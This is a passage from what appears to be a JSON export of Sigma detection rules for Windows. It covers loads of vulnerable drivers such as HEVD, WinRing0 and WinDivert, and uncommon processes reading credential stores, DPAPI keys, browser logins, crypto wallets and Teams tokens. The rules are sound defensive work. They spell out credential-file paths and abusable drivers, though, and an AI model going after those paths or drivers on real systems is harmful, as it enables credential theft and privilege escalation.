'\\asupio64.sys'\n            - '\\blackbonedrv10.sys'\n            - '\\d.sys'\n            - '\\driver7-x86.sys'\n            - '\\sfdrvx32.sys'\n            - '\\enetechio64.sys'\n            - '\\gdrv.sys'\n            - '\\sysinfodetectorx64.sys'\n            - '\\fh-ethercat_dio.sys'\n            - '\\asromgdrv.sys'\n            - '\\my.sys'\n            - '\\dcprotect.sys'\n            - '\\irec.sys'\n            - '\\gedevdrv.sys'\n            - '\\winio32a.sys'\n            - '\\gvcidrv64.sys'\n            - '\\winio32.sys'\n            - '\\bs_hwmio64.sys'\n            - '\\nstr.sys'\n            - '\\inpoutx64.sys'\n            - '\\hw.sys'\n            - '\\winio64.sys'\n            - '\\hpportiox64.sys'\n            - '\\iobitunlocker.sys'\n            - '\\b1.sys'\n            - '\\aoddriver.sys'\n            - '\\elbycdio.sys'\n            - '\\protects.sys'\n            - '\\kprocesshacker.sys'\n            - '\\speedfan.sys'\n            - '\\radhwmgr.sys'\n            - '\\iscflashx64.sys'\n            - '\\black.sys'\n            - '\\b4.sys'\n            - '\\hwos2ec10x64.sys'\n            - '\\winflash64.sys'\n            - '\\corsairllaccess64.sys'\n            - '\\bs_i2cio.sys'\n            - '\\d3.sys'\n            - '\\windows-xp-64.sys'\n            - '\\aswvmm.sys'\n            - '\\bs_i2c64.sys'\n            - '\\1.sys'\n            - '\\nchgbios2x64.sys'\n            - '\\cpuz141.sys'\n            - '\\segwindrvx64.sys'\n            - '\\tdeio64.sys'\n            - '\\ntiolib.sys'\n            - '\\gtckmdfbs.sys'\n            - '\\iomap64.sys'\n            - '\\avalueio.sys'\n            - '\\semav6msr.sys'\n            - '\\lgdcatcher.sys'\n            - '\\b.sys'\n            - '\\hwdetectng.sys'\n            - '\\nt4.sys'\n            - '\\tgsafe.sys'\n            - '\\mydrivers.sys'\n            - '\\eneio64.sys'\n            - '\\procexp.sys'\n            - '\\viragt64.sys'\n            - '\\fpcie2com.sys'\n            - '\\lenovodiagnosticsdriver.sys'\n            - '\\cp2x72c.sys'\n            - '\\kerneld.amd64'\n            - '\\bs_def64.sys'\n            - '\\piddrv.sys'\n            - '\\amifldrv64.sys'\n            - '\\cpuz_x64.sys'\n            - '\\proxy32.sys'\n            - '\\wsdkd.sys'\n            - '\\t8.sys'\n            - '\\ucorew64.sys'\n            - '\\atszio.sys'\n            - '\\lmiinfo.sys'\n            - '\\80.sys'\n            - '\\nt3.sys'\n            - '\\ngiodriver.sys'\n            - '\\lv561av.sys'\n            - '\\gpcidrv64.sys'\n            - '\\fd3b7234419fafc9bdd533f48896ed73_b816c5cd.sys'\n            - '\\rtport.sys'\n            - '\\full.sys'\n            - '\\viragt.sys'\n            - '\\fiddrv64.sys'\n            - '\\cupfixerx64.sys'\n            - '\\cpupress.sys'\n            - '\\hwos2ec7x64.sys'\n            - '\\driver7-x86-withoutdbg.sys'\n            - '\\asrdrv10.sys'\n            - '\\nvflsh64.sys'\n            - '\\asrrapidstartdrv.sys'\n            - '\\tmcomm.sys'\n            - '\\wiseunlo.sys'\n            - '\\rwdrv.sys'\n            - '\\asio64.sys'\n            - '\\nvoclock.sys'\n            - '\\panio.sys'\n            - '\\mtcbsv64.sys'\n            - '\\amigendrv64.sys'\n            - '\\capcom.sys'\n            - '\\netflt.sys'\n            - '\\phlashnt.sys'\n            - '\\dbutil_2_3.sys'\n            - '\\ni.sys'\n            - '\\ntiolib_x64.sys'\n            - '\\atszio64.sys'\n            - '\\lgcoretemp.sys'\n            - '\\lha.sys'\n            - '\\phymem64.sys'\n            - '\\dbutildrv2.sys'\n            - '\\asrdrv103.sys'\n            - '\\rtcore64.sys'\n            - '\\bs_hwmio64_w10.sys'\n            - '\\ene.sys'\n            - '\\winio64b.sys'\n            - '\\piddrv64.sys'\n            - '\\directio32.sys'\n            - '\\monitor_win10_x64.sys'\n            - '\\nt5.sys'\n            - '\\asrsmartconnectdrv.sys'\n            - '\\rtif.sys'\n            - '\\atillk64.sys'\n            - '\\directio.sys'\n            - '\\asribdrv.sys'\n            - '\\kfeco11x64.sys'\n            - '\\citmdrv_ia64.sys'\n            - '\\sysdrv3s.sys'\n            - '\\amp.sys'\n            - '\\vboxdrv.sys'\n            - '\\adv64drv.sys'\n            - '\\hostnt.sys'\n            - '\\phymem_ext64.sys'\n            - '\\echo_driver.sys'\n            - '\\winiodrv.sys'\n            - '\\pdfwkrnl.sys'\n            - '\\glckio2.sys'\n            - '\\asrdrv106.sys'\n            - '\\nscm.sys'\n            - '\\bs_rcio64.sys'\n            - '\\ncpl.sys'\n            - '\\sandra.sys'\n            - '\\fiddrv.sys'\n            - '\\hwrwdrv.sys'\n            - '\\mhyprot.sys'\n            - '\\asrsetupdrv103.sys'\n            - '\\iqvw64.sys'\n            - '\\b3.sys'\n            - '\\ssport.sys'\n            - '\\bs_def.sys'\n            - '\\computerz.sys'\n            - '\\windows8-10-32.sys'\n            - '\\nstrwsk.sys'\n            - '\\lurker.sys'\n            - '\\bsmemx64.sys'\n            - '\\wyproxy64.sys'\n            - '\\asio.sys'\n            - '\\t3.sys'\n            - '\\cpuz.sys'\n            - '\\rtkio.sys'\n            - '\\driver7-x64.sys'\n            - '\\netfilterdrv.sys'\n            - '\\ioaccess.sys'\n            - '\\testbone.sys'\n            - '\\gameink.sys'\n            - '\\kevp64.sys'\n            - '\\mhyprot2.sys'\n            - '\\se64a.sys'\n            - '\\vboxusb.sys'\n            - '\\windows7-32.sys'\n            - '\\vproeventmonitor.sys'\n            - '\\winio64a.sys'\n            - '\\asrdrv101.sys'\n            - '\\netproxydriver.sys'\n            - '\\elrawdsk.sys'\n            - '\\zam64.sys'\n            - '\\cg6kwin2k.sys'\n            - '\\asupio.sys'\n            - '\\stdcdrvws64.sys'\n            - '\\81.sys'\n            - '\\citmdrv_amd64.sys'\n            - '\\amdryzenmasterdriver.sys'\n            - '\\vmdrv.sys'\n            - '\\sysinfo.sys'\n            - '\\alsysio64.sys'\n            - '\\directio64.sys'\n            - '\\rzpnk.sys'\n            - '\\amdpowerprofiler.sys'\n            - '\\truesight.sys'\n            - '\\wirwadrv.sys'\n            - '\\phymemx64.sys'\n            - '\\msio64.sys'\n            - '\\sepdrv3_1.sys'\n            - '\\gametersafe.sys'\n            - '\\bs_rcio.sys'\n            - '\\d4.sys'\n            - '\\t.sys'\n            - '\\eio.sys'\n            - '\\nt2.sys'\n            - '\\winring0.sys'\n            - '\\physmem.sys'\n            - '\\libnicm.sys'\n            - '\\msio32.sys'\n            - '\\asrautochkupddrv.sys'\n            - '\\asio32.sys'\n            - '\\etdsupp.sys'\n            - '\\smep_namco.sys'\n            - '\\bandai.sys'\n            - '\\d2.sys'\n            - '\\magdrvamd64.sys'\n            - '\\nvflash.sys'\n            - '\\goad.sys'\n            - '\\proxy64.sys'\n            - '\\amsdk.sys'\n            - '\\kbdcap64.sys'\n            - '\\vdbsv64.sys'\n            - '\\pchunter.sys'\n            - '\\sysconp.sys'\n            - '\\dh_kernel_10.sys'\n            - '\\msrhook.sys'\n            - '\\bedaisy.sys'\n            - '\\dcr.sys'\n            - '\\panmonflt.sys'\n            - '\\bsmixp64.sys'\n            - '\\otipcibus.sys'\n            - '\\fidpcidrv.sys'\n            - '\\kfeco10x64.sys'\n            - '\\asrdrv104.sys'\n            - '\\c.sys'\n            - '\\tdklib64.sys'\n            - '\\bsmix64.sys'\n            - '\\bs_flash64.sys'\n            - '\\stdcdrv64.sys'\n            - '\\naldrv.sys'\n            - '\\ctiio64.sys'\n            - '\\bwrs.sys'\n            - '\\nicm.sys'\n            - '\\winio32b.sys'\n            - '\\paniox64.sys'\n            - '\\ecsiodriverx64.sys'\n            - '\\iomem64.sys'\n            - '\\fidpcidrv64.sys'\n            - '\\aswarpot.sys'\n            - '\\bs_rciow1064.sys'\n            - '\\asmio64.sys'\n            - '\\openlibsys.sys'\n            - '\\viraglt64.sys'\n            - '\\dbk64.sys'\n            - '\\t7.sys'\n            - '\\atlaccess.sys'\n            - '\\nbiolib_x64.sys'\n            - '\\smep_capcom.sys'\n            - '\\iqvw64e.sys'\n    condition: selection\nfalsepositives:\n    - False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.\n    - If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)\nlevel: low\n"
  },
  {
    "path": "rules/windows/driver_load/driver_load_win_vuln_hevd_driver.yml",
    "content": "title: Vulnerable HackSys Extreme Vulnerable Driver Load\nid: 295c9289-acee-4503-a571-8eacaef36b28\nstatus: test\ndescription: Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors\nreferences:\n    - https://github.com/hacksysteam/HackSysExtremeVulnerableDriver\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-18\nmodified: 2024-11-23\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        - ImageLoaded|endswith: '\\HEVD.sys'\n        - Hashes|contains:\n              - 'IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5' # Version 3.0\n              - 'IMPHASH=c46ea2e651fd5f7f716c8867c6d13594' # Version 3.0\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/driver_load/driver_load_win_vuln_winring0_driver.yml",
    "content": "title: Vulnerable WinRing0 Driver Load\nid: 1a42dfa6-6cb2-4df9-9b48-295be477e835\nstatus: test\ndescription: Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation\nreferences:\n    - https://github.com/xmrig/xmrig/tree/master/bin/WinRing0\n    - https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-07-26\nmodified: 2024-11-23\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        - Hashes|contains: 'IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7'\n        - ImageLoaded|endswith:\n              - '\\WinRing0x64.sys'\n              - '\\WinRing0.sys'\n              - '\\WinRing0.dll'\n              - '\\WinRing0x64.dll'\n              - '\\winring00x64.sys'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/driver_load/driver_load_win_windivert.yml",
    "content": "title: WinDivert Driver Load\nid: 679085d5-f427-4484-9f58-1dc30a7c426d\nstatus: test\ndescription: Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows\nreferences:\n    - https://reqrypt.org/windivert-doc.html\n    - https://rastamouse.me/ntlm-relaying-via-cobalt-strike/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-07-30\nmodified: 2024-11-23\ntags:\n    - attack.credential-access\n    - attack.collection\n    - attack.defense-evasion\n    - attack.t1599.001\n    - attack.t1557.001\nlogsource:\n    category: driver_load\n    product: windows\ndetection:\n    selection:\n        - ImageLoaded|contains:\n              - '\\WinDivert.sys'\n              - '\\WinDivert64.sys'\n              # Other used names\n              - '\\NordDivert.sys'\n              - '\\lingtiwfp.sys'\n              - '\\eswfp.sys'\n        - Hashes|contains:\n              - 'IMPHASH=0604bb7cb4bb851e2168d5c7d9399087'\n              - 'IMPHASH=2e5f0e649d97f32b03c09e4686d0574f'\n              - 'IMPHASH=52f8aa269f69f0edad9e8fcdaedce276'\n              - 'IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76'\n              - 'IMPHASH=58623490691babe8330adc81cd04a663'\n              - 'IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b'\n              - 'IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96'\n              - 'IMPHASH=a1b2e245acd47e4a348e1a552a02859a'\n              - 'IMPHASH=2a5f85fe4609461c6339637594fa9b0a'\n              - 'IMPHASH=6b2c6f95233c2914d1d488ee27531acc'\n              - 'IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342'\n              - 'IMPHASH=d8a719865c448b1bd2ec241e46ac1c88'\n              - 'IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38'\n              - 'IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6'\n              - 'IMPHASH=a74929edfc3289895e3f2885278947ae'\n              - 'IMPHASH=a66b476c2d06c370f0a53b5537f2f11e'\n              - 'IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4'\n              - 'IMPHASH=c28cd6ccd83179e79dac132a553693d9'\n    condition: selection\nfalsepositives:\n    - Legitimate WinDivert driver usage\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_access/file_access_win_susp_credential_manager_access.yml",
    "content": "title: Credential Manager Access By Uncommon Applications\nid: 407aecb1-e762-4acf-8c7b-d087bcff3bb6\nstatus: test\ndescription: |\n    Detects suspicious processes based on name and location that access the windows credential manager and vault.\n    Which can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\nreferences:\n    - https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz\n    - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-11\nmodified: 2024-07-29\ntags:\n    - attack.t1003\n    - attack.credential-access\nlogsource:\n    category: file_access\n    product: windows\n    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'\ndetection:\n    selection:\n        FileName|contains:\n            - '\\AppData\\Local\\Microsoft\\Credentials\\'\n            - '\\AppData\\Roaming\\Microsoft\\Credentials\\'\n            - '\\AppData\\Local\\Microsoft\\Vault\\'\n            - '\\ProgramData\\Microsoft\\Vault\\'\n    filter_system_folders:\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Windows\\system32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason).\n# Increase level after false positives filters are good enough\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_access/file_access_win_susp_credhist.yml",
    "content": "title: Access To Windows Credential History File By Uncommon Applications\nid: 7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2\nstatus: test\ndescription: |\n    Detects file access requests to the Windows Credential History File by an uncommon application.\n    This can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\nreferences:\n    - https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist\n    - https://www.passcape.com/windows_password_recovery_dpapi_credhist\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-17\nmodified: 2024-07-29\ntags:\n    - attack.credential-access\n    - attack.t1555.004\nlogsource:\n    category: file_access\n    product: windows\n    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'\ndetection:\n    selection:\n        FileName|endswith: '\\Microsoft\\Protect\\CREDHIST'\n    filter_main_system_folders:\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Windows\\system32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    filter_main_explorer:\n        Image: 'C:\\Windows\\explorer.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\n# Increase level after false positives filters are good enough\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_access/file_access_win_susp_crypto_currency_wallets.yml",
    "content": "title: Access To Crypto Currency Wallets By Uncommon Applications\nid: f41b0311-44f9-44f0-816d-dd45e39d4bc8\nstatus: test\ndescription: |\n    Detects file access requests to crypto currency files by uncommon processes.\n    Could indicate potential attempt of crypto currency wallet stealing.\nreferences:\n    - Internal Research\nauthor: X__Junior (Nextron Systems)\ndate: 2024-07-29\ntags:\n    - attack.t1003\n    - attack.credential-access\nlogsource:\n    category: file_access\n    product: windows\n    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'\ndetection:\n    selection:\n        - FileName|contains:\n              - '\\AppData\\Roaming\\Ethereum\\keystore\\'\n              - '\\AppData\\Roaming\\EthereumClassic\\keystore\\'\n              - '\\AppData\\Roaming\\monero\\wallets\\'\n        - FileName|endswith:\n              - '\\AppData\\Roaming\\Bitcoin\\wallet.dat'\n              - '\\AppData\\Roaming\\BitcoinABC\\wallet.dat'\n              - '\\AppData\\Roaming\\BitcoinSV\\wallet.dat'\n              - '\\AppData\\Roaming\\DashCore\\wallet.dat'\n              - '\\AppData\\Roaming\\DogeCoin\\wallet.dat'\n              - '\\AppData\\Roaming\\Litecoin\\wallet.dat'\n              - '\\AppData\\Roaming\\Ripple\\wallet.dat'\n              - '\\AppData\\Roaming\\Zcash\\wallet.dat'\n    filter_main_system:\n        Image: System\n    filter_main_generic:\n        # This filter is added to avoid large amount of FP with 3rd party software. You should remove this in favour of specific filter per-application\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\system32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    filter_optional_defender:\n        Image|startswith: 'C:\\ProgramData\\Microsoft\\Windows Defender\\'\n        Image|endswith:\n            - '\\MpCopyAccelerator.exe'\n            - '\\MsMpEng.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Antivirus, Anti-Spyware, Anti-Malware Software\n    - Backup software\n    - Legitimate software installed on partitions other than \"C:\\\"\n    - Searching software such as \"everything.exe\"\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_access/file_access_win_susp_dpapi_master_key_access.yml",
    "content": "title: Access To Windows DPAPI Master Keys By Uncommon Applications\nid: 46612ae6-86be-4802-bc07-39b59feb1309\nstatus: test\ndescription: |\n    Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application.\n    This can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\nreferences:\n    - http://blog.harmj0y.net/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/\n    - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-17\nmodified: 2024-07-29\ntags:\n    - attack.credential-access\n    - attack.t1555.004\nlogsource:\n    category: file_access\n    product: windows\n    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'\ndetection:\n    selection:\n        FileName|contains:\n            - '\\Microsoft\\Protect\\S-1-5-18\\' # For System32\n            - '\\Microsoft\\Protect\\S-1-5-21-' # For Users\n    filter_system_folders:\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Windows\\system32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\n# Increase level after false positives filters are good enough\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_access/file_access_win_susp_gpo_files.yml",
    "content": "title: Access To Potentially Sensitive Sysvol Files By Uncommon Applications\nid: d51694fe-484a-46ac-92d6-969e76d60d10\nrelated:\n    - id: 8344c19f-a023-45ff-ad63-a01c5396aea0\n      type: derived\nstatus: test\ndescription: Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.\nreferences:\n    - https://github.com/vletoux/pingcastle\nauthor: frack113\ndate: 2023-12-21\nmodified: 2024-07-29\ntags:\n    - attack.credential-access\n    - attack.t1552.006\nlogsource:\n    category: file_access\n    product: windows\n    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'\ndetection:\n    selection:\n        FileName|startswith: '\\\\'\n        FileName|contains|all:\n            - '\\sysvol\\'\n            - '\\Policies\\'\n        FileName|endswith:\n            - 'audit.csv'\n            - 'Files.xml'\n            - 'GptTmpl.inf'\n            - 'groups.xml'\n            - 'Registry.pol'\n            - 'Registry.xml'\n            - 'scheduledtasks.xml'\n            - 'scripts.ini'\n            - 'services.xml'\n    filter_main_generic:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\system32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    filter_main_explorer:\n        Image: 'C:\\Windows\\explorer.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_access/file_access_win_susp_process_access_browser_cred_files.yml",
    "content": "title: Suspicious File Access to Browser Credential Storage\nid: a1dfd976-4852-41d4-9507-dc6590a3ccd0\nstatus: experimental\ndescription: |\n    Detects file access to browser credential storage paths by non-browser processes, which may indicate credential access attempts.\n    Adversaries may attempt to access browser credential storage to extract sensitive information such as usernames and passwords or cookies.\n    This behavior is often commonly observed in credential stealing malware.\nreferences:\n    - https://github.com/splunk/security_content/blob/7283ba3723551f46b69dfeb23a63b358afb2cb0e/lookups/browser_app_list.csv?plain=1\n    - https://fourcore.io/blogs/threat-hunting-browser-credential-stealing\nauthor: frack113, X__Junior (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems), Parth-FourCore\ndate: 2025-05-22\ntags:\n    - attack.credential-access\n    - attack.t1555.003\n    - attack.discovery\n    - attack.t1217\nlogsource:\n    category: file_access\n    product: windows\ndetection:\n    selection_browser_paths:\n        FileName|contains:\n            - '\\Sputnik\\Sputnik'\n            - '\\MapleStudio\\ChromePlus'\n            - '\\QIP Surf'\n            - '\\BlackHawk'\n            - '\\7Star\\7Star'\n            - '\\CatalinaGroup\\Citrio'\n            - '\\Google\\Chrome'\n            - '\\Coowon\\Coowon'\n            - '\\CocCoc\\Browser'\n            - '\\uCozMedia\\Uran'\n            - '\\Tencent\\QQBrowser'\n            - '\\Orbitum'\n            - '\\Slimjet'\n            - '\\Iridium'\n            - '\\Vivaldi'\n            - '\\Chromium'\n            - '\\GhostBrowser'\n            - '\\CentBrowser'\n            - '\\Xvast'\n            - '\\Chedot'\n            - '\\SuperBird'\n            - '\\360Browser\\Browser'\n            - '\\360Chrome\\Chrome'\n            - '\\Comodo\\Dragon'\n            - '\\BraveSoftware\\Brave-Browser'\n            - '\\Torch'\n            - '\\UCBrowser\\'\n            - '\\Blisk'\n            - '\\Epic Privacy Browser'\n            - '\\Nichrome'\n            - '\\Amigo'\n            - '\\Kometa'\n            - '\\Xpom'\n            - '\\Microsoft\\Edge'\n            - '\\Liebao7Default\\EncryptedStorage'\n            - '\\AVAST Software\\Browser'\n            - '\\Kinza'\n            - '\\Mozilla\\SeaMonkey\\'\n            - '\\Comodo\\IceDragon\\'\n            - '\\8pecxstudios\\Cyberfox\\'\n            - '\\FlashPeak\\SlimBrowser\\'\n            - '\\Moonchild Productions\\Pale Moon\\'\n    selection_browser_subpaths:\n        FileName|contains:\n            - '\\Profiles\\'\n            - '\\User Data'\n    selection_cred_files:\n        - FileName|contains:\n              - '\\Login Data'\n              - '\\Cookies'\n              - '\\EncryptedStorage'\n              - '\\WebCache\\'\n        - FileName|endswith:\n              - 'cert9.db'\n              - 'cookies.sqlite'\n              - 'formhistory.sqlite'\n              - 'key3.db'\n              - 'key4.db'\n              - 'Login Data.sqlite'\n              - 'logins.json'\n              - 'places.sqlite'\n    filter_main_img:\n        Image|endswith:\n            - '\\Sputnik.exe'\n            - '\\ChromePlus.exe'\n            - '\\QIP Surf.exe'\n            - '\\BlackHawk.exe'\n            - '\\7Star.exe'\n            - '\\Sleipnir5.exe'\n            - '\\Citrio.exe'\n            - '\\Chrome SxS.exe'\n            - '\\Chrome.exe'\n            - '\\Coowon.exe'\n            - '\\CocCocBrowser.exe'\n            - '\\Uran.exe'\n            - '\\QQBrowser.exe'\n            - '\\Orbitum.exe'\n            - '\\Slimjet.exe'\n            - '\\Iridium.exe'\n            - '\\Vivaldi.exe'\n            - '\\Chromium.exe'\n            - '\\GhostBrowser.exe'\n            - '\\CentBrowser.exe'\n            - '\\Xvast.exe'\n            - '\\Chedot.exe'\n            - '\\SuperBird.exe'\n            - '\\360Browser.exe'\n            - '\\360Chrome.exe'\n            - '\\dragon.exe'\n            - '\\brave.exe'\n            - '\\torch.exe'\n            - '\\UCBrowser.exe'\n            - '\\BliskBrowser.exe'\n            - '\\Epic Privacy Browser.exe'\n            - '\\nichrome.exe'\n            - '\\AmigoBrowser.exe'\n            - '\\KometaBrowser.exe'\n            - '\\XpomBrowser.exe'\n            - '\\msedge.exe'\n            - '\\LiebaoBrowser.exe'\n            - '\\AvastBrowser.exe'\n            - '\\Kinza.exe'\n            - '\\seamonkey.exe'\n            - '\\icedragon.exe'\n            - '\\cyberfox.exe'\n            - '\\SlimBrowser.exe'\n            - '\\palemoon.exe'\n    filter_main_path:\n        Image|contains:\n            - '\\Sputnik\\'\n            - '\\MapleStudio\\'\n            - '\\QIP Surf\\'\n            - '\\BlackHawk\\'\n            - '\\7Star\\'\n            - '\\Fenrir Inc\\'\n            - '\\CatalinaGroup\\'\n            - '\\Google\\'\n            - '\\Coowon\\'\n            - '\\CocCoc\\'\n            - '\\uCozMedia\\'\n            - '\\Tencent\\'\n            - '\\Orbitum\\'\n            - '\\Slimjet\\'\n            - '\\Iridium\\'\n            - '\\Vivaldi\\'\n            - '\\Chromium\\'\n            - '\\GhostBrowser\\'\n            - '\\CentBrowser\\'\n            - '\\Xvast\\'\n            - '\\Chedot\\'\n            - '\\SuperBird\\'\n            - '\\360Browser\\'\n            - '\\360Chrome\\'\n            - '\\Comodo\\'\n            - '\\BraveSoftware\\'\n            - '\\Torch\\'\n            - '\\UCBrowser\\'\n            - '\\Blisk\\'\n            - '\\Epic Privacy Browser\\'\n            - '\\Nichrome\\'\n            - '\\Amigo\\'\n            - '\\Kometa\\'\n            - '\\Xpom\\'\n            - '\\Microsoft\\'\n            - '\\Liebao7\\'\n            - '\\AVAST Software\\'\n            - '\\Kinza\\'\n            - '\\Mozilla\\'\n            - '\\8pecxstudios\\'\n            - '\\FlashPeak\\'\n            - '\\Moonchild Productions\\'\n    filter_main_system:\n        Image: System\n        ParentImage: Idle\n    filter_main_generic:\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    filter_optional_defender:\n        Image|contains: '\\Microsoft\\Windows Defender\\'\n        Image|endswith:\n            - '\\MpCopyAccelerator.exe'\n            - '\\MsMpEng.exe'\n    filter_optional_thor:\n        Image|endswith:\n            - '\\thor.exe'\n            - '\\thor64.exe'\n    filter_optional_msiexec:\n        ParentImage: 'C:\\Windows\\System32\\msiexec.exe'\n    filter_optional_other:\n        Image|endswith: '\\everything.exe'\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Antivirus, Anti-Spyware, Anti-Malware Software\n    - Legitimate software accessing browser data for synchronization or backup purposes.\n    - Legitimate software installed on partitions other than \"C:\\\"\nlevel: low\n"
  },
  {
    "path": "rules/windows/file/file_access/file_access_win_teams_sensitive_files.yml",
    "content": "title: Microsoft Teams Sensitive File Access By Uncommon Applications\nid: 65744385-8541-44a6-8630-ffc824d7d4cc\nstatus: test\ndescription: |\n    Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process.\nreferences:\n    - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/\n    - https://www.vectra.ai/blog/undermining-microsoft-teams-security-by-mining-tokens\nauthor: '@SerkinValery'\ndate: 2024-07-22\ntags:\n    - attack.credential-access\n    - attack.t1528\nlogsource:\n    product: windows\n    category: file_access\n    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'\ndetection:\n    selection:\n        FileName|contains:\n            - '\\Microsoft\\Teams\\Cookies'\n            - '\\Microsoft\\Teams\\Local Storage\\leveldb'\n    filter_main_legit_location:\n        # Note: its best to filter the full path to avoid false negatives\n        Image|endswith: '\\Microsoft\\Teams\\current\\Teams.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml",
    "content": "title: Unusual File Modification by dns.exe\nid: 9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3\nrelated:\n    - id: 8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0 # FileDelete version\n      type: similar\nstatus: test\ndescription: Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)\nreferences:\n    - https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns-exe.html\nauthor: Tim Rauch (Nextron Systems), Elastic (idea)\ndate: 2022-09-27\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.t1133\nlogsource:\n    category: file_change\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\dns.exe'\n    filter:\n        TargetFilename|endswith: '\\dns.log'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_delete/file_delete_win_delete_backup_file.yml",
